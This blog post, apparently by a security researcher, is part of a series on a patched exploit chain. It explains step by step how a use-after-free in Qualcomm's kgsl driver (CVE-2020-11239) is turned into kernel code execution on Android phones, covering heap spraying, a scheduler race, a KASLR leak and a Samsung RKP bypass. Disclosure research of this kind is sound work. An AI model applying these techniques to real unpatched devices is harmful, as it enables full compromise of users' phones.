In this series of posts, I’ll exploit three bugs that I reported last year: a use-after-free in the renderer of Chrome, a Chromium sandbox escape that was reported and fixed while it was still in beta, and a use-after-free in the Qualcomm msm kernel. Together, these three bugs form an exploit chain that allows remote kernel code execution by visiting a malicious website in the beta version of Chrome. While the full chain itself only affects beta version of Chrome, both the renderer RCE and kernel code execution existed in stable versions of the respective software. All of these bugs had been patched for quite some time, with the last one patched on the first of January.
Vulnerabilities used in the series
The three vulnerabilities that I’m going to use are the following. To achieve arbitrary kernel code execution from a compromised beta version of Chrome, I’ll use CVE-2020-11239, which is a use-after-free in the kgsl driver in the Qualcomm msm kernel. This vulnerability was reported in July 2020 to the Android security team as A-161544755 (GHSL-2020-375) and was patched in the Januray Bulletin. In the security bulletin, this bug was mistakenly associated with A-168722551, although the Android security team has since confirmed to acknowledge me as the original reporter of the issue. (However, the acknowledgement page had not been updated to reflect this at the time of writing.) For compromising Chrome, I’ll use CVE-2020-15972, a use-after-free in web audio to trigger a renderer RCE. This is a duplicate bug, for which an anonymous researcher reported about three weeks before I reported it as 1125635 (GHSL-2020-167). To escape the Chrome sandbox and gain control of the browser process, I’ll use CVE-2020-16045, which was reported as 1125614 (GHSL-2020-165). While the exploit uses a component that was only enabled in the beta version of Chrome, the bug would probably have made it to the stable version and be exploitable if it weren’t reported. Interestingly, the renderer bug CVE-2020-15972 was fixed in version 86.0.4240.75, the same version where the sandbox escape bug would have made into stable version of Chrome (if not reported), so these two bugs literally missed each other by one day to form a stable full chain.
Qualcomm kernel vulnerability
The vulnerability used in this post is a use-after-free in the kernel graphics support layer (kgsl) driver. This driver is used to provide an interface for apps in the userland to communicate with the Adreno gpu (the gpu that is used on Qualcomm’s snapdragon chipset). As it is necessary for apps to access this driver to render themselves, this is one of the few drivers that can be reached from third-party applications on all phones that use Qualcomm chipsets. The vulnerability itself can be triggered on all of these phones that have a kernel version 4.14 or above, which should be the case for many mid-high end phones released after late 2019, for example, Pixel 4, Samsung Galaxy S10, S20, and A71. The exploit in this post, however, could not be launched directly from a third party App on Pixel 4 due to further SELinux restrictions, but it can be launched from third party Apps on Samsung phones and possibly some others as well. The exploit in this post is largely developed with a Pixel 4 running AOSP built from source and then adapted to a Samsung Galaxy A71. With some adjustments of parameters, it should probably also work on flagship models like Samsung Galaxy S10 and S20 (Snapdragon version), although I don’t have those phones and have not tried it out myself.
The vulnerability here concerns the ioctl calls
When using these calls, the caller specifies a user space address in their process, the size of the shared memory, as well as the type of memory objects to create. After making the ioctl call successfully, the kgsl driver would map the user supplied memory into the gpu’s memory space and be able to access the user supplied memory. Depending on the type of the memory specified in the ioctl call parameter, different mechanisms are used by the kernel to map and access the user space memory.
The two different types of memory are
long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
unsigned int cmd, void *data)
{
...
entry = kgsl_mem_entry_create();
...
if (param->type == KGSL_USER_MEM_TYPE_ADDR)
ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
entry, param);
//KGSL_USER_MEM_TYPE_ION is translated to KGSL_USER_MEM_TYPE_DMABUF
else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
entry, param, &fd);
else
ret = -ENOTSUPP;
In particular, when creating a
- The user creates a DMA buffer using the ion allocator. On Android, ion is the concrete implementation of DMA buffers, so sometimes the terms are used interchangeably, as in the kgsl code here, in which
andKGSL_USER_MEM_TYPE_DMABUFrefers to the same thing.KGSL_USER_MEM_TYPE_ION
- The ion allocator will then allocate memory from the ion heap, which is a special region of memory seperated from the heap used by the
family of calls. I’ll cover more about the ion heap later in the post.kmalloc
- The ion allocator will return a file descriptor to the user, which is used as a handle to the DMA buffer.
- The user can then pass this file descriptor to the device via an appropriate ioctl call.
- The device then obtains the DMA buffer from the file descriptor via
and usesdma_buf_getto attach it to itself.dma_buf_attach
- The device uses
to obtain thedma_buf_map_attachmentof the DMA buffer, which contains the locations and sizes of the backing stores of the DMA buffer. It can then use it to access the buffer.sg_table
- After this, both the device and the user can access the DMA buffer. This means that the buffer can now be modified by both the cpu (by the user) and the device. So care must be taken to synchronize the cpu view of the buffer and the device view of the buffer. (For example, the cpu may cache the content of the DMA buffer and then the device modified its content, resulting in stale data in the cpu (user) view) To do this, the user can use
call of the DMA buffer to synchronize the different views of the buffer before and after accessing it.DMA_BUF_IOCTL_SYNC
When the device is done with the shared buffer, it is important to call the functions
In the case of sharing DMA buffer with the kgsl driver, the
static int kgsl_setup_dma_buf(struct kgsl_device *device,
struct kgsl_pagetable *pagetable,
struct kgsl_mem_entry *entry,
struct dma_buf *dmabuf)
{
...
sg_table = dma_buf_map_attachment(attach, DMA_TO_DEVICE);
...
meta->table = sg_table;
entry->priv_data = meta;
entry->memdesc.sgt = sg_table;
On the other hand, in the case of a
static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
{
...
//Creates an sg_table and stores it in memdesc->sgt
ret = sg_alloc_table_from_pages(memdesc->sgt, pages, npages,
0, memdesc->size, GFP_KERNEL);
As such, care must be taken with the ownership of
unmap:
if (param->type == KGSL_USER_MEM_TYPE_DMABUF) {
kgsl_destroy_ion(entry->priv_data);
entry->memdesc.sgt = NULL;
}
kgsl_sharedmem_free(&entry->memdesc);
If we created an ION type memory object, then apart from the extra clean up that detaches the gpu from the DMA buffer,
void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc)
{
...
if (memdesc->sgt) {
sg_free_table(memdesc->sgt);
kfree(memdesc->sgt);
}
if (memdesc->pages)
kgsl_free(memdesc->pages);
}
So far, so good, everything is taken care of, but a closer look reveals that, when creating a
static int kgsl_setup_useraddr(struct kgsl_device *device,
struct kgsl_pagetable *pagetable,
struct kgsl_mem_entry *entry,
unsigned long hostptr, size_t offset, size_t size)
{
...
/* Try to set up a dmabuf - if it returns -ENODEV assume anonymous */
ret = kgsl_setup_dmabuf_useraddr(device, pagetable, entry, hostptr);
if (ret != -ENODEV)
return ret;
/* Okay - lets go legacy */
return kgsl_setup_anon_useraddr(pagetable, entry,
hostptr, offset, size);
}
While there is nothing wrong with using a DMA mapping when the user supplied memory is actually a dma buffer (allocated by ion), if something goes wrong during the ioctl call, the clean up logic will be wrong and
static int ion_dma_buf_attach(struct dma_buf *dmabuf, struct device *dev,
struct dma_buf_attachment *attachment)
{
...
table = dup_sg_table(buffer->sg_table);
...
a->table = table; //<---- c. duplicated table stored in attachment, which is the output of dma_buf_attach in a.
...
mutex_lock(&buffer->lock);
list_add(&a->list, &buffer->attachments); //<---- d. attachment got added to dma_buf::attachments
mutex_unlock(&buffer->lock);
return 0;
}
This will normally be removed when the DMA buffer is detached from the device. However, because of the wrong clean up logic, the DMA buffer will never be detached in this case, (
static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
enum dma_data_direction direction,
bool sync_only_mapped)
{
...
list_for_each_entry(a, &buffer->attachments, list) {
...
if (sync_only_mapped)
tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl, //<--- use-after-free of a->table
a->table->nents,
&buffer->vmas,
direction, true);
else
dma_sync_sg_for_cpu(a->dev, a->table->sgl, //<--- use-after-free of a->table
a->table->nents, direction);
...
}
}
...
}
There are actually multiple paths in this ioctl that can lead to the use of the
Getting a free’d object with a fake out-of-memory error
While this looks like a very good use-after-free that allows me to hold onto a free’d object and use it at any convenient time, as well as in different ways, to trigger it, I first need to cause the
long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
unsigned int cmd, void *data)
{
...
kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);
if (param->type == KGSL_USER_MEM_TYPE_ADDR)
ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
entry, param);
else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
entry, param, &fd);
else
ret = -ENOTSUPP;
if (ret)
goto out;
...
ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry);
if (ret)
goto unmap;
This is the last point where the call can fail. Any earlier failure will also not result in
static int kgsl_mem_entry_attach_process(struct kgsl_device *device,
struct kgsl_process_private *process,
struct kgsl_mem_entry *entry)
{
...
ret = kgsl_mem_entry_track_gpuaddr(device, process, entry);
if (ret) {
kgsl_process_private_put(process);
return ret;
}
Of course, to actually cause an out-of-memory error would be rather difficult and unreliable, as well as risking to crash the device by exhausting the memory.
If we look at how a user provided address is mapped to gpu address in
static int kgsl_iommu_get_gpuaddr(struct kgsl_pagetable *pagetable,
struct kgsl_memdesc *memdesc)
{
...
unsigned int align;
...
//Uses `memdesc->flags` to compute the alignment parameter
align = max_t(uint64_t, 1 << kgsl_memdesc_get_align(memdesc),
memdesc->pad_to);
...
and the flags of
long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
unsigned int cmd, void *data)
{
...
kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);
When mapping memory to the gpu, this
The primitives of the vulnerability
As mentioned before, there are different ways to use the free’d
static long dma_buf_ioctl(struct file *file,
unsigned int cmd, unsigned long arg)
{
...
switch (cmd) {
case DMA_BUF_IOCTL_SYNC:
...
if (sync.flags & DMA_BUF_SYNC_END)
if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
ret = dma_buf_end_cpu_access_umapped(dmabuf,
dir);
else
ret = dma_buf_end_cpu_access(dmabuf, dir);
else
if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
ret = dma_buf_begin_cpu_access_umapped(dmabuf,
dir);
else
ret = dma_buf_begin_cpu_access(dmabuf, dir);
return ret;
These will ended up calling the functions
As explained before, the
- The
in the free’dscatterlistis iterated in a loop;sg_table
- In each iteration, the
anddma_addressof thedma_lengthis used to identify the location and size of the memory for synchronization.scatterlist
- The function
is called to perform the actual synchronization of the memory.swiotlb_sync_single
So what does
static void
swiotlb_sync_single(struct device *hwdev, dma_addr_t dev_addr,
size_t size, enum dma_data_direction dir,
enum dma_sync_target target)
{
phys_addr_t paddr = dma_to_phys(hwdev, dev_addr);
BUG_ON(dir == DMA_NONE);
if (is_swiotlb_buffer(paddr)) {
swiotlb_tbl_sync_single(hwdev, paddr, size, dir, target);
return;
}
if (dir != DMA_FROM_DEVICE)
return;
dma_mark_clean(phys_to_virt(paddr), size);
}
The function
void swiotlb_tbl_sync_single(struct device *hwdev, phys_addr_t tlb_addr,
size_t size, enum dma_data_direction dir,
enum dma_sync_target target)
{
int index = (tlb_addr - io_tlb_start) >> IO_TLB_SHIFT;
phys_addr_t orig_addr = io_tlb_orig_addr[index];
if (orig_addr == INVALID_PHYS_ADDR) //<--------- a. checks address valid
return;
orig_addr += (unsigned long)tlb_addr & ((1 << IO_TLB_SHIFT) - 1);
switch (target) {
case SYNC_FOR_CPU:
if (likely(dir == DMA_FROM_DEVICE || dir == DMA_BIDIRECTIONAL))
swiotlb_bounce(orig_addr, tlb_addr,
size, DMA_FROM_DEVICE);
...
}
After a further check of the address (
static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
size_t size, enum dma_data_direction dir)
{
...
unsigned char *vaddr = phys_to_virt(tlb_addr);
if (PageHighMem(pfn_to_page(pfn))) {
...
while (size) {
sz = min_t(size_t, PAGE_SIZE - offset, size);
local_irq_save(flags);
buffer = kmap_atomic(pfn_to_page(pfn));
if (dir == DMA_TO_DEVICE)
memcpy(vaddr, buffer + offset, sz);
else
memcpy(buffer + offset, vaddr, sz);
...
}
} else if (dir == DMA_TO_DEVICE) {
memcpy(vaddr, phys_to_virt(orig_addr), size);
} else {
memcpy(phys_to_virt(orig_addr), vaddr, size);
}
}
As
- What is the
and is it possible to pass theswiotlb_buffercheck without a seperate info leak?is_swiotlb_buffer
- What is the
and how to pass that test?io_tlb_orig_addr
- How much control do I have with the
, which comes fromorig_addr?io_tlb_orig_addr
The Software Input Output Translation Lookaside Buffer
The Software Input Output Translation Lookaside Buffer (SWIOTLB), sometimes known as the bounce buffer, is a memory region with physical address smaller than 32 bits. It seems to be very rarely used in modern Android phones and as far as I can gather, there are two main uses of it:
- It is used when a DMA buffer that has a physical address higher than 32 bits is attached to a device that can only access 32 bit addresses. In this case, the SWIOTLB is used as a proxy of the DMA buffer to allow access of it from the device. This is the code path that we have been looking at. As this would mean an extra read/write operation between the DMA buffer and the SWIOTLB every time a synchronization between the device and DMA buffer happens, it is not an ideal scenario but is rather only used as a last resort.
- To use as a layer of protection to avoid untrusted usb devices from accessing DMA memory directly (See here)
As the second usage is likely to involve plugging a usb device to a phone and thus requires physical access. I’ll only cover the first usage here, which will also answer the three questions in the previous section.
To begin with, let’s take a look at the location of the SWIOTLB. This is used by the check
int is_swiotlb_buffer(phys_addr_t paddr)
{
return paddr >= io_tlb_start && paddr < io_tlb_end;
}
The global variables
...
[ 0.000000] c0 0 software IO TLB: swiotlb init: 00000000f3800000
[ 0.000000] c0 0 software IO TLB: mapped [mem 0xf3800000-0xf3c00000] (4MB)
...
Here we see that
While allocating the SWIOTLB early makes sure that the its address is below 32 bits, it also makes it predictable. In fact, the address only seems to depend on the amount of memory configured for the SWIOTLB, which is passed as the
[ 0.000000] software IO TLB: mapped [mem 0xfffbf000-0xfffff000] (0MB)
The SWIOTLB will be at the same location when changing
This provides us with a predicable location for the SWIOTLB to pass the
Let’s take a look at
int
swiotlb_map_sg_attrs(struct device *hwdev, struct scatterlist *sgl, int nelems,
enum dma_data_direction dir, unsigned long attrs)
{
...
for_each_sg(sgl, sg, nelems, i) {
phys_addr_t paddr = sg_phys(sg);
dma_addr_t dev_addr = phys_to_dma(hwdev, paddr);
if (swiotlb_force == SWIOTLB_FORCE ||
!dma_capable(hwdev, dev_addr, sg->length)) {
//device cannot access dev_addr, so use SWIOTLB as a proxy
phys_addr_t map = map_single(hwdev, sg_phys(sg),
sg->length, dir, attrs);
...
}
In this case,
static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
size_t size, enum dma_data_direction dir)
{
...
//orig_addr is the address of a DMA buffer uses the SWIOTLB mapping
} else if (dir == DMA_TO_DEVICE) {
memcpy(vaddr, phys_to_virt(orig_addr), size);
} else {
memcpy(phys_to_virt(orig_addr), vaddr, size);
}
}
It now becomes clear that, if I can allocate a SWIOTLB, then I will be able to perform both read and write of a region behind the SWIOTLB region with arbitrary size (and completely controlled content in the case of write). In what follows, this is what I’m going to use for the exploit.
To summarize, this is how synchronization works for DMA buffer shared with the implementation in
When the device is capable of accessing the DMA buffer’s address, synchronization will involve flushing the cpu cache:

When the device cannot access the DMA buffer directly, a SWIOTLB is created as an intermediate buffer to allow device access. In this case, the

In the use-after-free scenario, I can control the size of the

Provided I can control the
Allocating a Software Input Output Translation Lookaside Buffer
As it turns out, the SWIOTLB is actually very rarely used. For one or another reason, either because most devices are capable of reading 64 bit addresses, or that the DMA buffer synchronization is implemented with
Roughly speaking, the DSP is a specialized chip that is optimized for certain computationally intensive tasks such as image, video, audio processing and machine learning. The cpu can offload these tasks to the DSP to improve overall performance. However, as the DSP is a different processor altogether, an RPC mechanism is needed to pass data and instructions between the cpu and the DSP. This is what the
While access to the
With
static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd,
unsigned int attr, uintptr_t va, size_t len, int mflags,
struct fastrpc_mmap **ppmap)
{
...
} else if (mflags == FASTRPC_DMAHANDLE_NOMAP) {
VERIFY(err, !IS_ERR_OR_NULL(map->buf = dma_buf_get(fd)));
if (err)
goto bail;
VERIFY(err, !dma_buf_get_flags(map->buf, &flags));
...
map->attach->dma_map_attrs |= DMA_ATTR_SKIP_CPU_SYNC;
...
However, the call seems to always fail when
Another possibility is to use the
static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
{
...
for (i = bufs; i < bufs + handles; i++) {
...
if (ctx->attrs && (ctx->attrs[i] & FASTRPC_ATTR_NOMAP))
dmaflags = FASTRPC_DMAHANDLE_NOMAP;
VERIFY(err, !fastrpc_mmap_create(ctx->fl, ctx->fds[i],
FASTRPC_ATTR_NOVA, 0, 0, dmaflags,
&ctx->maps[i]));
...
}
The
static int fastrpc_internal_invoke(struct fastrpc_file *fl, uint32_t mode,
uint32_t kernel,
struct fastrpc_ioctl_invoke_crc *inv)
{
...
if (REMOTE_SCALARS_LENGTH(ctx->sc)) {
PERF(fl->profile, GET_COUNTER(perf_counter, PERF_GETARGS),
VERIFY(err, 0 == get_args(kernel, ctx)); //<----- get_args
PERF_END);
if (err)
goto bail;
}
...
wait:
if (kernel) {
....
} else {
interrupted = wait_for_completion_interruptible(&ctx->work);
VERIFY(err, 0 == (err = interrupted));
if (err)
goto bail; //<----- invocation failed and jump to bail directly
}
...
VERIFY(err, 0 == put_args(kernel, ctx, invoke->pra)); //<------ detach the arguments
PERF_END);
...
bail:
...
return err;
}
So by using
Now that I can allocate SWIOTLB that maps to DMA buffers that I created, I can do the following to exploit the out-of-bounds read/write primitive from the previous section.
- First allocate a number of DMA buffers. By manipulating the ion heap, (which I’ll go through later in this post), I can place some useful data behind one of these DMA buffers. I will call this buffer
.DMA_1
- Use the
driver to allocate SWIOTLB buffers associated with these DMA buffers. I’ll arrange it so that theadsprpcoccupies the first SWIOTLB (which means all other SWIOTLB will be allocated behind it), call thisDMA_1. This can be done easily as SWIOTLB are simply allocated as a contiguous array.SWIOTLB_1
- Use the read/write primitive in the previous section to trigger out-of-bounds read/write on
. This will either write the memory behindDMA_1to the SWIOTLB behindDMA_1, or vice versa.SWIOTLB_1
- As the SWIOTLB behind
are mapped to the other DMA buffers that I controlled, I can use theSWIOTLB_1ioctl of these DMA buffers to either read data from these SWIOTLB or write data to them. This translates into arbitrary read/write of memory behindDMA_BUF_IOCTL_SYNC.DMA_1
The following figure illustrates this with a simplified case of two DMA buffers.

Replacing the
sg_table
So far, I planned an exploitation strategy based on the assumption that I already have control of the
from FunctionCall fc, Type t, Variable v, Field f, Type t2
where (fc.getTarget().hasName("kmalloc") or
fc.getTarget().hasName("kzalloc") or
fc.getTarget().hasName("kcalloc"))
and
exists(Assignment assign | assign.getRValue() = fc and
assign.getLValue() = v.getAnAccess() and
v.getType().(PointerType).refersToDirectly(t)) and
t.getSize() < 128 and t.fromSource() and
f.getDeclaringType() = t and
(f.getType().(PointerType).refersTo(t2) and t2.getSize() <= 8) and
f.getByteOffset() = 0
select fc, t, fc.getLocation()
In this query, I look for objects created via
struct filename *
getname_flags(const char __user *filename, int flags, int *empty)
{
struct filename *result;
...
if (unlikely(len == EMBEDDED_NAME_MAX)) {
...
result = kzalloc(size, GFP_KERNEL);
if (unlikely(!result)) {
__putname(kname);
return ERR_PTR(-ENOMEM);
}
result->name = kname;
len = strncpy_from_user(kname, filename, PATH_MAX);
...
with
Just-in-time object replacement
Let’s take a look at how the free’d
static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
enum dma_data_direction direction,
bool sync_only_mapped)
{
if (sync_only_mapped)
tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl, //<------- `sgl` got passed, and `table` never used again
a->table->nents,
&buffer->vmas,
direction, true);
else
dma_sync_sg_for_cpu(a->dev, a->table->sgl,
a->table->nents, direction);
While source code could be misleading as auto function inlining is common in kernel code (in fact
To resolve this, I’ll use a technique by Jann Horn in Exploiting race conditions on [ancient] Linux, which turns out to still work like a charm on modern Android.
To ensure that each task(thread or process) has a fair share of the cpu time, the linux kernel scheduler can interrupt a running task and put it on hold, so that another task can be run. This kind of interruption and stopping of a task is called preemption (where the interrupted task is preempted). A task can also put itself on hold to allow other task to run, such as when it is waiting for some I/O input, or when it calls
To gain better control in both these areas, cpu affinity and task priorities can be used. By default, a task is run with the priority
- First have the
task perform a syscall that would cause it to pause and wait. For example, it can read from a pipe with no data coming in from the other end, then it would wait for more data and voluntarily preempt itself, so that theSCHED_NORMALtask can run;SCHED_IDLE
- As the
task is running, send some data to the pipe that theSCHED_IDLEtask had been waiting on. This will wake up theSCHED_NORMALtask and cause it to preempt theSCHED_NORMALtask, and because of the task priority, theSCHED_IDLEtask will be preempted and put on hold.SCHED_IDLE
- The
task can then run a busy loop to keep theSCHED_NORMALtask from waking up.SCHED_IDLE
In our case, the object replacement sequence goes as follows:
- Obtain a free’d
in a DMA buffer using the method in the section Getting a free’d object with a fake out-of-memory error.sg_table
- First replace this free’d
with another one that I can free easily, for example, making another call tosg_tablewill give me a handle to aIOCTL_KGSL_GPUOBJ_IMPORTobject, which allocates and owns akgsl_mem_entry. Making this call immediately after step one will ensure that the newly createdsg_tablereplaces the one that was free’d in step one. To free this newsg_table, I can callsg_tablewith the handle of theIOCTL_KGSL_GPUMEM_FREE_ID, which will free thekgsl_mem_entryand in turn frees thekgsl_mem_entry. In practice, a little bit more heap manipulation is needed assg_tablewill allocate another object of similar size before allocating aIOCTL_KGSL_GPUOBJ_IMPORT.sg_table
- Set up a
task on, say,SCHED_NORMALthat is listening to an empty pipe.cpu_1
- Set up a
task on the same cpu and have it wait until I signal it to runSCHED_IDLEon the DMA buffer that contains theDMA_BUF_IOCTL_SYNCin step two.sg_table
- The main task signals the
task to runSCHED_IDLE.DMA_BUF_IOCTL_SYNC
- The main task waits a suitable amount of time until
is cached in registry, then send data to the pipe that thesgltask is waiting on.SCHED_NORMAL
- Once it receives data, the
task goes into a busy loop to keep theSCHED_NORMALtask from continuing.DMA_BUF_IOCTL_SYNC
- The main task then calls
to free up theIOCTL_KGSL_GPUMEM_FREE_ID, which will also free the object pointed to bysg_tablethat is now cached in the registry. The main task then replaces this object by controlled data usingsglheap spraying. This gives control of bothsendmsganddma_addressindma_length, which are used as arguments tosgl.memcpy
- The main task signals the
task onSCHED_NORMALto stop so that thecpu_1task can resume.DMA_BUF_IOCTL_SYNC
The following figure illustrates what happens in an ideal world.

The following figure illustrates what happens in the real world.

Crazy as it seems, the race can actually be won almost every time, and the same parameters that control the timing would even work on both the Galaxy A71 and Pixel 4. Even when the race failed, it does not result in a crash. It can, however, crash, if the
The ion heap
Now that I’m able to replace the
To allocate DMA buffers, I need to use the ion allocator, which will allocate from the ion heap. There are different types of ion heaps, but not all of them are suitable, because I need one that would allocate buffers with addresses greater than 32 bit. The locations of various ion heap can be seen from the kernel log during a boot, the following is from Galaxy A71:
[ 0.626370] ION heap system created
[ 0.626497] ION heap qsecom created at 0x000000009e400000 with size 2400000
[ 0.626515] ION heap qsecom_ta created at 0x00000000fac00000 with size 2000000
[ 0.626524] ION heap spss created at 0x00000000f4800000 with size 800000
[ 0.626531] ION heap secure_display created at 0x00000000f5000000 with size 5c00000
[ 0.631648] platform soc:qcom,ion:qcom,ion-heap@14: ion_secure_carveout: creating heap@0xa4000000, size 0xc00000
[ 0.631655] ION heap secure_carveout created
[ 0.631669] ION heap secure_heap created
[ 0.634265] cleancache enabled for rbin cleancache
[ 0.634512] ION heap camera_preview created at 0x00000000c2000000 with size 25800000
As we can see, some ion heap are created at fixed locations with fixed sizes. The addresses of these heaps are also smaller than 32 bits. However, there are other ion heaps, such as the system heap, that does not have a fixed address. These are the heaps that have addresses higher than 32 bits. For the exploit, I’ll use the system heap.
DMA buffers allocated on the system heap is allocated via the
static void *ion_page_pool_alloc_pages(struct ion_page_pool *pool)
{
struct page *page = alloc_pages(pool->gfp_mask, pool->order);
...
return page;
}
and recycle the pages back to the pool after the buffer is freed.
This later case is more interesting because if the memory is allocated from the initial pool, then any out-of-bounds read/write are likely to just be reading and writing other ion buffers, which is only going to be user space data. So let’s take a look at
The function
kmalloc-8192 1036 1036 8192 4 8 : tunables 0 0 0 : slabdata 262 262 0
...
kmalloc-128 378675 384000 128 32 1 : tunables 0 0 0 : slabdata 12000 12000 0
In the above, the
Manipulating the buddy allocator heap
As mentioned in Exploiting the Linux kernel via packet sockets, for each order, the buddy allocator maintains a freelist and use it to allocate memory of the appropriate order. When a certain order (
In fact, after some experimentation on Pixel 4, it seems that after allocating a certain amount of DMA buffers from the ion system heap, the allocation will follow a very predicatble pattern.
- The addresses of the allocated buffers are grouped in blocks of 4MB, which corresponds to order 10, the highest order block on Android.
- Within each block, a new allocations will be adjacent to the previous one, with a higher address.
- When a 4MB block is filled, allocations will start in the beginning of the next block, which is right below the current 4MB block.
The following figure illustrates this pattern.

So by simply creating a large amount of DMA buffers in the ion system heap, the likelihood would be that the last allocated buffer will be allocated in front of a «hole» of free memory, and the next allocation from the buddy allocator is likely to be inside this hole, provided the requested number of pages fits in this hole.
The heap spraying strategy is then very simple. First allocate a sufficient amount of DMA buffers in the ion heap to cause larger blocks to break up, then allocate a large amount of objects using
Defeating KASLR and leaking address to DMA buffer
Initially, I was experimenting with the
static int binder_open(struct inode *nodp, struct file *filp)
{
...
proc = kzalloc(sizeof(*proc), GFP_KERNEL);
if (proc == NULL)
which is of size 560 and will persist until the
00011020: 68b2 8e68 c1ff ffff 08af 5109 80ff ffff h..h......Q.....
00011030: 0000 0000 0000 0000 0100 0000 0000 0000 ................
00011040: 0000 0200 1d00 0000 0000 0000 0000 0000 ................
...
The
# echo 0 > /proc/sys/kernel/kptr_restrict
# cat /proc/kallsyms | grep ffffff800951af08
ffffff800951af08 r binder_fops
So looks like these are
Moreover, the
struct mutex {
atomic_long_t owner;
spinlock_t wait_lock;
...
struct list_head wait_list;
...
};
which is a standard doubly linked list in linux:
struct list_head {
struct list_head *next, *prev;
};
When
By using the address of
- Use the out-of-bounds read primitive gained from the use-after-free to dump memory behind a DMA buffer that I controlled.
- Search for binder
structs within the memory using the predictable pattern and get the offset of thefilestruct.file
- Use the identified
struct to obtain the address offileand the address of thebinder_fopsstruct itself from thefilefield.wait_list
- Use the
address to work out the KASLR slide and use the address of thebinder_fopsstruct, together with the offset identified in step two to work out the address of the DMA buffer.file
- Use the out-of-bounds write primitive gained from the use-after-free to overwrite the
pointer to the file that corresponds to thisf_opsstruct (which I owned), so that it now points to a fakefilestruct stored in my DMA buffer. Using file operations on this file will then execute functions of my choice.file_operation
Since there is nothing special about
Getting arbitrary kernel code execution
To complete the exploit, I’ll use «the ultimate ROP gadget» that was used in An iOS hacker tries Android of Brandon Azad (and I in fact stole a large chunk of code from his exploit). As explained in that post, the function
unsigned int __bpf_prog_run32(const void *ctx, const bpf_insn *insn)
to invoke eBPF bytecode, I need to set the second argument to point to the location of the bytecode. As I already know the address of a DMA buffer that I control, I can simply store the bytecode in the buffer and use its address as the second argument to this call. This would allow us to perform arbitrary memory load/store and call arbitrary kernel functions with up to five arguments and a 64 bit return value.
There is, however one more detail that needs taking care of. Samsung devices implement an extra protection mechanism called the Realtime Kernel Protection (RKP), which is part of Samsung KNOX. Research on the topic is widely available, for example, Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection by Gal Beniamini and Defeating Samsung KNOX with zero privilege by Di Shen.
For the purpose of our exploit, the more recent A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Byapsses by Dong-Hoon You are relevant. In particular, A Samsung RKP Compendium offers a thorough and comprehensive description of various aspects of RKP.
Without going into much details about RKP, the two parts that are relevant to our situation are:
- RKP implements a form of CFI (control flow integrity) check to make sure that all function calls can only jump to the beginning of another function (JOPP, jump-oriented programming prevention).
- RKP protects important data structure such as the credentials of a process so they are effectively read only.
Point one means that even though I can hijack the
In our situation, point one is actually not a big obstacle. The fact that I am able to hijack the
struct file_operations {
struct module *owner;
loff_t (*llseek) (struct file *, loff_t, int);
...
This function takes a 64 bit integer,
off_t lseek64(int fd, off_t offset, int whence);
where
As explained before, because of RKP, it is not possible to simply overwrite process credentials to become root even with arbitrary kernel code execution. However, as pointed out in Mitigations are attack surface, too by Jann Horn, once we have arbitrary kernel memory read and write, all the userspace data and processes are essentially under control and there are many ways to gain control over privileged user processes, such as those with system privilege to effectively gain system privileges. Apart from the concrete technique mentioned in that post for accessing sensitive data, another concrete technique mentioned in Galaxy’s Meltdown — Exploiting SVE-2020-18610 is to overwrite the kernel stack of privileged processes to gain arbitrary kernel code execution as a privileged process. In short, there are many post exploitation techniques available at this stage to effectively root the phone.
Conclusion
In this post I looked at a use-after-free bug in the Qualcomm kgsl driver. The bug was a result of a mismatch between the user supplied memory type and the actual type of the memory object created by the kernel, which led to incorrect clean up logic being applied when an error happens. In this case, two common software errors, the ambiguity in the role of a type, and incorrect handling of errors, played together to cause a serious security issue that can be exploited to gain arbitrary kernel code execution from a third-party app.
While great progress has been made in sandboxing the userspace services in Android, the kernel, in particular vendor drivers, remain a dangerous attack surface. A successful exploit of a memory corruption issue in a kernel driver can escalate to gain the full power of the kernel, which often result in a much shorter exploit bug chain.
The full exploit can be found here with some set up notes.
Next week I’ll be going through the exploit of Chrome issue 1125614 (GHSL-2020-165) to escape the Chrome sandbox from a beta version of Chrome.